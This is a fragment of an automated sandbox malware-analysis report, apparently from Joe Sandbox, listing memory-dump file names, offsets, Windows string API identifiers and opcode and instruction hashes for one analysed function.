                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                              • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                                              • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                              • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9